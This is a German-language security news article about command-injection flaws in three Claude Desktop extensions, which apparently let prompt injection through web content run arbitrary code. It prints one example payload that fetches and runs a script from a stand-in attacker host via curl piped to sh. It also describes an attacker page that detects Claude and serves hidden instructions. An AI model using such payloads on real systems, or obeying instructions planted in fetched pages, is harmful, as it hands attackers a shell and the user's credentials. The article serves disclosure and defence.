PromptJacking: Wenn KI-Prompts zu Cyberangriffen werden

Schwachstellen in den Erweiterungen von Claude Desktop zeigen, wie einfache KI-Prompts zur Kompromittierung von Systemen führen können.

Verfasst von
Ken Underhill
Ken Underhill
Nov 5, 2025
3 minute read
eSecurity Planet Inhalte und Produktempfehlungen sind redaktionell unabhängig. Wir können Geld verdienen, wenn Sie auf Links zu unseren Partnern klicken. Mehr erfahren

Tools für künstliche Intelligenz (KI) sind rasch zu einem festen Bestandteil moderner Arbeitsabläufe geworden und unterstützen Nutzer bei allem – von der Datenanalyse bis zum kreativen Schreiben.

Die Entdeckung kritischer Schwachstellen in vertrauenswürdigen KI-Plattformen erinnert jedoch daran, dass selbst hochmoderne Systeme nicht gegen herkömmliche Sicherheitslücken gefeit sind.

Die kürzlich entdeckten Schwachstellen zur Remotecodeausführung (RCE) in den offiziellen Erweiterungen von Claude Desktop machen ein ernstes Sicherheitsproblem in KI-integrierten Umgebungen deutlich.

Wie aus einem einfachen Prompt ein Angriff wird

Koi-Forscher haben kürzlich schwerwiegende RCE-Schwachstellen in drei offiziellen Claude-Desktop-Erweiterungen entdeckt – für Chrome, iMessage und Apple Notes.

Alle wiesen denselben grundlegenden Fehler auf: nicht bereinigte Befehlsinjektion.

Diese Schwachstelle ermöglichte es Angreifern, Claude Desktop allein durch die Manipulation des Inhalts einer Nutzeranfrage oder der von einer Website abgerufenen Daten auszunutzen.

In der Praxis bedeutete dies, dass eine scheinbar harmlose Frage – etwa „Wo kann ich in Brooklyn Paddle spielen?“ – die Ausführung beliebigen Codes auf dem Rechner des Nutzers auslösen konnte.

Sensible Daten wie SSH-Schlüssel, AWS-Zugangsdaten oder gespeicherte Browserpasswörter konnten ohne schädlichen Download oder Phishing-Versuch gestohlen werden.

Anthropic stufte die Schwachstellen als schwerwiegend ein (CVSS 8,9) und hat die Probleme inzwischen behoben.

Advertisement

Claude-Desktop-Erweiterungen verstehen

Claude-Desktop-Erweiterungen sind als modulare Verbindungspunkte konzipiert – verpackt als Model-Context-Protocol-(MCP-)Server –, über die Claude direkt mit lokalen Anwendungen interagieren kann.

Jede Erweiterung wird als ein .mcpb-Bundle verteilt, das sowohl den MCP-Servercode als auch ein Manifest mit einer Beschreibung seiner Funktionen enthält. Konzeptionell funktionieren sie ähnlich wie Chrome-Erweiterungen, unterscheiden sich aber in der Implementierung.

Während Chrome-Erweiterungen innerhalb der Sicherheitssandbox des Browsers ausgeführt werden, laufen Claude-Desktop-Erweiterungen vollständig ohne Sandbox auf dem lokalen Rechner und verfügen über vollständige Systemberechtigungen.

Diese Designentscheidung ermöglicht eine tiefe Integration, birgt aber Risiken. Erweiterungen können Dateien lesen und verändern, Systembefehle ausführen und auf gespeicherte Zugangsdaten zugreifen.

Eine Befehlsinjektions-Schwachstelle in einer solchen Umgebung wird zu einem direkten Weg zur vollständigen Kompromittierung des Systems.

Die Schwachstelle

Im Kern der Schwachstelle stand eine unzureichende Eingabebereinigung. Jeder MCP-Server nahm vom Nutzer bereitgestellte Eingaben entgegen und übergab sie ohne Maskierung oder Validierung direkt an AppleScript-Befehle.

Wurde Claude beispielsweise angewiesen, diese URL in Chrome zu öffnen, erstellte die Erweiterung einen AppleScript-Befehl wie:

tell application “Google Chrome” to open location “${url}”

 

Wenn der Wert ${url} einen schädlichen Payload enthielt – etwa & do shell script “curl https://attacker.com/trojan | sh”& –, hätte er beliebige Shell-Befehle auf dem Hostsystem ausgeführt.

Von der Frage zur Kompromittierung

Die eigentliche Gefahr ging von Prompt-Injection über Webinhalte aus. Claude ruft häufig Webseiten ab und fasst sie zusammen, um Nutzeranfragen zu beantworten.

Wird eine dieser Seiten von einem Angreifer kontrolliert – oder wurde eine legitime Seite kompromittiert –, kann der Inhalt so gestaltet werden, dass er Anweisungen enthält, die die Schwachstelle auslösen.

Advertisement

In einem solchen Szenario könnte ein Nutzer Claude eine einfache Frage stellen und damit das Modell dazu veranlassen, Daten von einer von einem Angreifer kontrollierten Website abzurufen.

Diese Seite könnte Claude anhand seines User-Agents erkennen und einen versteckten Payload ausliefern. Claude würde den eingeschleusten Befehl dann unwissentlich über die verwundbare Erweiterung ausführen.

Das Ergebnis: Angreifer aus der Ferne erhalten lokalen Shell-Zugriff mit vollständigen Berechtigungen und können sensible Dateien stehlen, Hintertüren installieren oder Zugangsdaten exfiltrieren – ohne dass der Nutzer etwas Ungewöhnliches bemerkt.

Die verborgenen Risiken der KI-Integration

Auch wenn diese konkreten Schwachstellen inzwischen behoben wurden, verdeutlicht ihre Existenz ein grundlegenderes Problem in den sich entwickelnden Ökosystemen von KI-Erweiterungen.

Das MCP-Modell ermöglicht Entwicklern, Erweiterungen zu erstellen, die tief mit lokalen Systemen interagieren.

Die Kombination aus KI-gestützter Programmierung, begrenzten Sicherheitsprüfungen und dem Fehlen einer Sandbox birgt jedoch systemische Risiken.

Mit der zunehmenden Integration von KI-Plattformen in Betriebssysteme und Unternehmensumgebungen müssen Entwickler strenge Sicherheitspraktiken einführen, darunter eine strikte Eingabebereinigung, die Trennung von Berechtigungen und Code-Audits.

Organisationen sollten außerdem Maßnahmen nach dem Prinzip der Tiefenverteidigung einsetzen, etwa die Überwachung des ausgehenden Netzwerkverkehrs, die Durchsetzung der Ausführung mit geringstmöglichen Berechtigungen und die Isolierung von KI-Tools gegenüber sensiblen Zugangsdaten.

Die Schwachstellen von Claude Desktop zeigen, dass selbst vertrauenswürdige KI-Plattformen schwerwiegende Sicherheitslücken mit realen Folgen aufweisen können.

Mit der Ausweitung des KI-Ökosystems wird eine sichere Integration zwischen KI-Modellen und lokalen Systemen unverzichtbar sein. Die Lehre daraus ist nicht, diese Tools aufzugeben, sondern ihnen mit informierter Vorsicht zu begegnen.

Ken Underhill

Ken Underhill is an award-winning cybersecurity professional, bestselling author, and seasoned IT professional. He holds a graduate degree in cybersecurity and information assurance from Western Governors University and brings years of hands-on experience to the field.

eSecurity Planet Logo

eSecurity Planet is a leading resource for IT professionals at large enterprises who are actively researching cybersecurity vendors and latest trends. eSecurity Planet focuses on providing instruction for how to approach common security challenges, as well as informational deep-dives about advanced cybersecurity topics.

Eigentum von TechnologyAdvice. © 2026 TechnologyAdvice. Alle Rechte vorbehalten

Werbetreibenden-Offenlegung: Einige der auf dieser Website erscheinenden Produkte stammen von Unternehmen, von denen TechnologyAdvice eine Vergütung erhält. Diese Vergütung kann beeinflussen, wie und wo Produkte auf dieser Website erscheinen, einschließlich beispielsweise der Reihenfolge, in der sie erscheinen. TechnologyAdvice schließt nicht alle Unternehmen oder alle auf dem Marktplatz verfügbaren Produkttypen ein.